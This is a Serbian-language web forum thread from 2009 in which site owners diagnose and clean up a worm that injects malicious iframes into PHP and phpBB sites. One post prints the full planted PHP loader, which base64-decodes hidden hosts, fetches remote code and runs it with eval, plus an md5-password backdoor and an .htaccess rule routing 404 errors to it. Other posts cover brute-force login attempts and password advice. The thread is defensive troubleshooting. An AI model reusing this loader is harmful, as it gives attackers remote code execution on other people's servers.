[es] - Maliciozni iframe na sajtu

Aleksandar Ružičić
Software Architect, Appricot d.o.o.
Beograd

Član broj: 26939
Poruke: 2881

Jabber: krckoorascic@gmail.com
Sajt: krcko.net

+44 Profil

Re: Maliciozni iframe na sajtu

^{11.07.2009. u 16:28 - pre 179 meseci}

Citat:

Mister_rap: Sto se tice skripta, vazi ovo sto je krcko napisao ali u mom slucaju recimo bilo bi ga prilicno jednostavno napisati (mada licno ne vidim potrebu za tim) jer nemam html kod u php fajlovima pa je maliciozan kod izgledao ovako nekako:

Code:

<?php
//moj kod
?>

<?php
//kod crva koji sam postovao u svojoj prethodnoj poruci
?>

kao sto sam rekao, problem je sto se taj iframe ubacuje na vise razlicith nacina, kao php sa echo naredbom (u tom tvom slucaju, a i ja sam naletao na takav zapis), ili kao klasican html injectovan na random poziciju u fajl (sto u vecini slucajeva rezultuje E_PARSE php greskom sto je i rezultiralo otkrivanjem problema, da je crv malo intelignentiji bilo bi ga teze detektovati "golim okom")

sto se tice otkrivanja i sredjivanja zarazenih fajlova ja sam to radio sa grep-om i vi-om, bez ikakvih skripti :) (naravno problem je ako ima vise desetina zarazenih sajtova...)

rafforum.rs - Forum Računarskog Fakulteta

Odgovor na temu

valjan
Janko Valencik
Software Deployer
Schneider Electric
Novi Sad

Član broj: 158605
Poruke: 3531
87.116.144.*

+553 Profil

Re: Maliciozni iframe na sajtu

^{11.07.2009. u 23:22 - pre 179 meseci}

Ja sam u proteklih nekoliko meseci zapazio veliki broj neuspelih logovanja u logovima FTP servera, gotovo svakodnevno u dugim sesijama od po 3-4 sata. Naravno, odmah sam preko polise postavio blokadu da posle X neuspelih logovanja sledi Y minuta zakljucanog naloga, a kasnije sam dodao i ogranicenje sa kojih IP adresa je moguce pristupati serveru. Sto se samih logovanja tice, bilo je pokusaja sa "administrator" i "root" nalozima, kao i par "dictionary" napada gde su pokusavane razne vrednosti za username, po tri puta jedna pa se predje na sledecu i tako u nedogled.

Kasnije sam na ES-u saznao da nisam jedini koji je ovo zapazio (http://www.elitesecurity.org/t...server-problem-Source-MSFTPSVC) i cini mi se da je upravo ovo nacin kako je neko spolja dosao do FTP lozinki pa modifikovao PHP, JS i/ili HTML kod, samo sto ce ovde retko ko priznati da je uz username 'pera' koristio i password 'pera' ili neku slicnu kombinaciju koja se lako provaljuje ;-)

Odgovor na temu

Mister Big Time
The Consigliere
enterparadajz
Belgrade

Član broj: 15306
Poruke: 4747

Sajt: www.go2bed.net

+43 Profil

Re: Maliciozni iframe na sajtu

^{12.07.2009. u 03:53 - pre 179 meseci}

Meni se redovno na supljem Servage hostigu javlja neki crv/whatever...

ovo ubaci u meta deo HTML-a:

Code:

<meta name="verify-v1" content="mxfPDgANNdTL/dFlebcQbPRWGSEW2ppdGI69FuFcybY=" >

A u posebnom folderu se ponekad nadje ovo sto sam okacio kao RAR.

Gomila spiskova sa spam sajtovima / whatever.

Ako je neko voljan da analizira mehanizam sa PHP strane, koriste i .htaccess....

Mada dzaba sve kada je host supalj - uvek na istu foru ovo se rasiri po svim sajtovima :)

Odgovor na temu

Flo
Ivan Penčić
Beograd

Član broj: 41881
Poruke: 64
*.dynamic.sbb.rs.

Profil

Re: Maliciozni iframe na sajtu

^{26.10.2009. u 21:06 - pre 176 meseci}

Ja sam provalio da sam imao trojanca koji nod nije detektovao ali kasnije jeste kaspersky. Imam tri sajta na tri razlicita servera i sva tri su napadnuta na istom fazonu, ubacuje se ta jeb*na skripta i jeb* mi sajtove samo tako. Posto imam sve sajtove sejvovane na diskovima, da li ce mi pomoci ako ceo hard formatiram, instaliram windows, sve sa servera obrisem, promenim passworde i ponovo uploadujem sve fajlove na njih?

Pencha

Odgovor na temu

dakipro
Dalibor Jovic
Web Developer
Bergen, Norway

Moderator
Član broj: 31848
Poruke: 1792
91.148.83.*

Sajt: norway.dakipro.com

+190 Profil

Re: Maliciozni iframe na sajtu

^{06.11.2009. u 15:38 - pre 175 meseci}

Molimo clanove foruma da ne postavljaju kod koji pronadju na svom sajtu ovde, jer tako samo sire zarazu dalje, tj, postavljaju ovde taj isti maliciozni kod koji oni imaju.
Kao kada bi okacili virus na sajt da drugi vide pa da i oni dobiju isto to.

http://norway.dakipro.com/

Odgovor na temu

Phikret
Fikret Pašović
freelancer
Novi Pazar - Beograd

Član broj: 192541
Poruke: 71
*.teledot.net.

Sajt: www.mojestudije.info

+2 Profil

Re: Maliciozni iframe na sajtu

^{06.11.2009. u 15:41 - pre 175 meseci}

Kako se borite protiv ovog trojanca, posto je i mene jutros zakacio? Naime, imao sa u total commanderu snimljene ftp sifre i usere za desetak sajtova i samo mi je jedan zarazen tako da pretpostavljam da to nije put kojim mi je izmenjen kood, jer bi mi sigurno bio izmenjen i u ostalim sajtovima. Ovaj sajt koji mi je zarazen je phpBB forum i kood je ubacen najverovatnije u overall_footer, ali je problem sto ja taj kood ne vidim kada pregledam fajlove samo kada ucitam stranicu i pokrenem view source. Sta predlazete? Da li postoji mogucnost da se kood ubacuje dinamicki pri svakom requestu ka mom forumu? Nemam pojma gde jos da trazim taj kood!

Evo u prilogu kooda koji mi je ubacen u sajt. Napravio sam jpg od kooda jer mi je avast blokirao vezu ka ES pri pokusaju paste-ovanja koda.

Moze li neko da mi kaze da dekodujem ovaj dugacki string u kodu? Sta da koristim i kakav je ovo encoding? Pokusao sam unescape() u javascriptu ali unescape se odnosi na URL decoding.

http://www.mojestudije.info
Svako ima pravo da se kreće i da bude kreten

Prikačeni fajlovi

malicioznikod.png - 20.92k

Odgovor na temu

MilosDj
Milos Djuric
Belgrade

Član broj: 14174
Poruke: 307
93.86.101.*

+4 Profil

Re: Maliciozni iframe na sajtu

^{06.11.2009. u 16:44 - pre 175 meseci}

A da iskljucis avasta na sekund, prebacis taj kod u .txt? Pa onda rar ili 7z sa pass da bi mogli regularno da ih skidamo.

I'm not in this world to live up to your expectations and you're not in this world to live up to mine.

Odgovor na temu

Nemke_BG

Član broj: 163822
Poruke: 341
91.148.90.*

Jabber: Nemke_BG@elitesecurity.org
Sajt: https://www.nmdesign.rs

+45 Profil

Re: Maliciozni iframe na sajtu

^{06.11.2009. u 22:15 - pre 175 meseci}

pa ako bas mora nek iskljuci, kazem jer je poceo AV da divlja ko lud kad upalim mail jer mi stizu notifikacije sa ES-a sa tim sadrzajem.....

...

Odgovor na temu

Nemanja Avramović
Engineering Manager
MENU Technologies
Beograd, Srbija

Moderator
Član broj: 32202
Poruke: 4391
77.46.216.*

Sajt: https://avramovic.info

+46 Profil

Re: Maliciozni iframe na sajtu

^{07.11.2009. u 06:10 - pre 175 meseci}

Citat:

Moze li neko da mi kaze da dekodujem ovaj dugacki string u kodu?

To nije enkriptovan kôd već "obfuscated" (ne znam prevod za ovu reč na srpsi jezik), odnosno imena funkcija i promenljivih su zamenjeni slučajno generisanim stringovima, tako da ustvari i nema šta da se dekoduje ovde.

Laravel Srbija.

_{[NE PRUŽAM PODRŠKU ZA PHP PREKO PRIVATNIH PORUKA!]}

Odgovor na temu

Phikret
Fikret Pašović
freelancer
Novi Pazar - Beograd

Član broj: 192541
Poruke: 71
91.148.90.*

Sajt: www.mojestudije.info

+2 Profil

Re: Maliciozni iframe na sajtu

^{07.11.2009. u 16:01 - pre 175 meseci}

Ok, uspeo sam konačno da pronađem gde mi je ubačen kood. Kood je ubačen u cache/index.htm i files/index.htm fajlove i nalazi se u keširanim overall_footer.htm fajlovima u okviru foldera cache. E sad, primetio sam da se u isim folderima nalaze i još po tri php fajla sa nazivima: 87573.php i slično (dakle nasumični brojevi) i po jedan .htaccess fajl koji je u sebi sadržao sledeće:

Code:

<Files *>
Order Allow,Deny
Deny from All
</Files>
Options -MultiViews
ErrorDocument 404 //forum/cache/87573.php

Options -MultiViews
ErrorDocument 404 //forum/cache/19241.php

Options -MultiViews
ErrorDocument 404 //forum/cache/70221.php

Da li se tu radi o ubačenim fajlovima?

Sada ću da pregazim ove fajlove sa bekapovanim verzijama fajlova a prethodno sam i izmenio FTP, cPanel passworde pa da vidimo šta će dalje da se desi.

A ovo je sadržaj jednog od fajlova sa imenom napravljenim od nasumičnih brojeva i ekstenzijom .php

Code:

<? error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$
b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);

$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="d774a7241a40c4708a8f37e4a47eb817") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

http://www.mojestudije.info
Svako ima pravo da se kreće i da bude kreten

Odgovor na temu

Nemanja Avramović
Engineering Manager
MENU Technologies
Beograd, Srbija

Moderator
Član broj: 32202
Poruke: 4391
77.46.216.*

Sajt: https://avramovic.info

+46 Profil

Re: Maliciozni iframe na sajtu

^{07.11.2009. u 16:27 - pre 175 meseci}

to je to, to je virus.. i meni se dešavalo slično... uz pomoć .htaccess-a sve 404 greške usmerava na php fajl koji širi virus dalje...

obriši .htaccess, obriši te php fajlove sa random imenima i obriši cache foruma¹... trebalo bi da bude dovoljno

1 - ovo je možda bolje obrisati kroz sam forum

Laravel Srbija.

_{[NE PRUŽAM PODRŠKU ZA PHP PREKO PRIVATNIH PORUKA!]}

Odgovor na temu

Phikret
Fikret Pašović
freelancer
Novi Pazar - Beograd

Član broj: 192541
Poruke: 71
91.148.90.*

Sajt: www.mojestudije.info

+2 Profil

Re: Maliciozni iframe na sajtu

^{07.11.2009. u 17:14 - pre 175 meseci}

Da, video sam nakon što sam pregledao .htaccess fajlove i uporedio sadržaj mog foldera cache i foldera cache u novom instalacionom paketu. Obrisao sam fajlove i replace-ovao .htaccess fajlove i za sada je OK. Jedino što mi još uvek google prikazuje ispod linka koji se dobije kao rezultat pretrage da moj sajt može da naškodi posetiocima. Poslao sam zahtev za brisanjem tog upozorenja i čekam rezultat.

Nego sad gledam backup fajlove iz septembra i oktobra koje sam pravio preko cPanela i vidim da mi ti random name fajlovi stoje u folderima (još tada) a virus se aktivirao tek sada (odnosno juče ujutro)???

http://www.mojestudije.info
Svako ima pravo da se kreće i da bude kreten

Odgovor na temu

Nemanja Avramović
Engineering Manager
MENU Technologies
Beograd, Srbija

Moderator
Član broj: 32202
Poruke: 4391
77.46.216.*

Sajt: https://avramovic.info

+46 Profil

Re: Maliciozni iframe na sajtu

^{07.11.2009. u 18:22 - pre 175 meseci}

Definiši "aktivirao"?

Ako je poruka na google-u od juče, onda te je tek juče neko prijavio G-u

Ako ti je AV tek juče prijavio virus, onda:
1) AV tek od juče uspeva da prepozna virus (malo verovatno, ovo je mator crv)
2) tek juče je crv uspeo da upiše iframe u tvoje stranice

Laravel Srbija.

_{[NE PRUŽAM PODRŠKU ZA PHP PREKO PRIVATNIH PORUKA!]}

Odgovor na temu

Phikret
Fikret Pašović
freelancer
Novi Pazar - Beograd

Član broj: 192541
Poruke: 71
91.148.90.*

Sajt: www.mojestudije.info

+2 Profil

Re: Maliciozni iframe na sajtu

^{07.11.2009. u 20:40 - pre 175 meseci}

Biće da je ova druga opcija pod 2 :), jer sam pre nailazio na sajtove sa ovim crvom i avast mi je uredno prijavljivao i prekidao zahtev ka tom sajtu. Juče mi je stigla poruka od googla u kome me obaveštavaju da su postavili upozorenje. Kada sam pročitao mejl (koga sam za malo izbrisao jer je bio zaglavio u BULK), otišao sam na svoj forum (tog dana nisam pristupao forumu) i neprijatno se iznenadio.

Sada me interesuje koji su mogući načini da je došlo do injekcije? Ovakve su bile okolnosti:

Ti fajlovi su u tim folderima još od septembra dakle. U total commanderu sam imao snimljene sve ftp naloge za desetak sajtova i samo mi je phpbb forum dobio injekciju a ostali sajtovi nisu, tako da isključujem tu mogućnost da je injekcija došla otkrivanjem ftp naloga u total commanderu. Koji su još načini na koji je moglo ovo da mi se desi?

OFF topic: Zašto mi ne stiže e-mail notification da je bilo odgovora na temi iako sam se dvaput prijavio? Ovo je pitanje za nekoga iz administracije.

http://www.mojestudije.info
Svako ima pravo da se kreće i da bude kreten

Odgovor na temu

Nemanja Avramović
Engineering Manager
MENU Technologies
Beograd, Srbija

Moderator
Član broj: 32202
Poruke: 4391
77.46.216.*

Sajt: https://avramovic.info

+46 Profil

Re: Maliciozni iframe na sajtu

^{07.11.2009. u 21:02 - pre 175 meseci}

Pa moguće je da jeste preko Total Commandera ali jednostavno nije zarazio sve sajtove

E da, najnoviji TotalCmd ima master password i više nema ovakvih problema (krađa šifre).

A moguće je, ako si na shared hostingu, da je prešao sa nekog drugog sajta koji je bio zaražen, jer na shared hostingu (obično) svi sajtovi trče pod istim korisnikom, tako da nije problem crvu da pređe sa jednog na drugi. Zato sam ja stavio suPHP na server

A za offtopic pitanje je najbolje da se obratiš na forum "Predlozi i pitanja"

Laravel Srbija.

_{[NE PRUŽAM PODRŠKU ZA PHP PREKO PRIVATNIH PORUKA!]}

Odgovor na temu

Phikret
Fikret Pašović
freelancer
Novi Pazar - Beograd

Član broj: 192541
Poruke: 71
91.148.90.*

Sajt: www.mojestudije.info

+2 Profil

Re: Maliciozni iframe na sajtu

^{07.11.2009. u 21:32 - pre 175 meseci}

Da na shared hostingu je. Ma taj shared hosting je jedno veliko đubre. Ok, hvala na info.

http://www.mojestudije.info
Svako ima pravo da se kreće i da bude kreten

Odgovor na temu

valjan
Janko Valencik
Software Deployer
Schneider Electric
Novi Sad

Član broj: 158605
Poruke: 3531
*.adsl.eunet.rs.

+553 Profil

Re: Maliciozni iframe na sajtu

^{09.11.2009. u 08:03 - pre 175 meseci}

Ako sam dobro skontao sta ovaj crv radi, onda je kao okidac sluzila 404 stranica - prvi put kad je neko aktivira, pokrene se i crvic. Tako da je moguce da je on tu cucao mesecima sve dok neko nije zatrazio nesto cega nema, i evo "malise" kod tebe zivog i zdravog i budnog kako seje iframe-ove po sajtu...

Odgovor na temu

Nemanja Avramović
Engineering Manager
MENU Technologies
Beograd, Srbija

Moderator
Član broj: 32202
Poruke: 4391
79.101.145.*

Sajt: https://avramovic.info

+46 Profil

Re: Maliciozni iframe na sajtu

^{09.11.2009. u 08:22 - pre 175 meseci}

Upravo tako

Laravel Srbija.

_{[NE PRUŽAM PODRŠKU ZA PHP PREKO PRIVATNIH PORUKA!]}

Odgovor na temu

Phikret
Fikret Pašović
freelancer
Novi Pazar - Beograd

Član broj: 192541
Poruke: 71
*.teledot.net.

Sajt: www.mojestudije.info

+2 Profil

Re: Maliciozni iframe na sajtu

^{10.11.2009. u 14:24 - pre 175 meseci}

Ok, taman sam mislio da sam se ratosiljao ovog napasnika kad se on pojavi na jos jednom mestu. Nakon što sam google-u prijavio da mi je sajt čist i nakon što je google izbacio ono upozorenje, prilikom mog pokušaja da uđem u jedan od podforuma pojavilo mi se upozorenje da imam <iframe. Pomislio sam da je virus opet upisao iframe u index.htm fajlove foldera cache i file i da je opet izmenio .htaccess fajlove i nisam bio u pravu. Ovog puta iframe je bio u opisu jednog podforuma koji stoji ispod naziva foruma (u phpBB3), što znači da je upisan u bazu. Izbrisao sam iz baze i sada sam skroz čist. E sad me interesuje, da li je ovaj crv toliko pametan, da se nije upisao u sve ostale podforume, već samo u taj jedan kako bi stvorio privid da je sajt bezbedan ili je nešto drugo u pitanju? I još jedno, mnogo bitnije pitanje je kako je uspeo da upiše u bazu i izmeni opis foruma. To može da radi samo administrator (koji je samo jedan na mom forumu). To znači da se on logovao kao Admin? Pre ovoga sam primetio u latest visits listi da je bio veliki broj pokušaja neuspešnih registracija novog usera i logina, ali je u jednom trenutku bio i uspešan login.

http://www.mojestudije.info
Svako ima pravo da se kreće i da bude kreten

Odgovor na temu

valjan
Janko Valencik
Software Deployer
Schneider Electric
Novi Sad

Član broj: 158605
Poruke: 3531
*.dynamic.sbb.rs.

+553 Profil

Re: Maliciozni iframe na sajtu

^{10.11.2009. u 17:07 - pre 175 meseci}

Po ovom tvom opisu bih rekao da je uradjen brute-force ili dictionary napad (u prvom slucaju, vrteli su sve kombinacije slova i brojeva dok nisu uboli pravu, u drugom su isprobavali neke reci koje se cesto koriste za lozinke). Sve u svemu, izgleda da si imao suvise jednostavnu lozinku, pa su te lako sredili - da bi ubuduce to izbegao, koristi lozinke koje nisu krace od 8 znakova, imaju i mala i velika slova i brojeve i specijalne znake, i to po mogucstvu izmesane po sto slucajnijem principu. Znaci, ako zelis recimo da iskoristis Phikret u lozinci, onda je najbolje da uradis nesto poput Phikret > pHiKrEt > p0H1i2K3r4E5t6 pa ga jos malo istumbas (stavis recimo ! umesto i, izvuces poslednjih sest znakova pa ih prebacis napred i sl...)

Odgovor na temu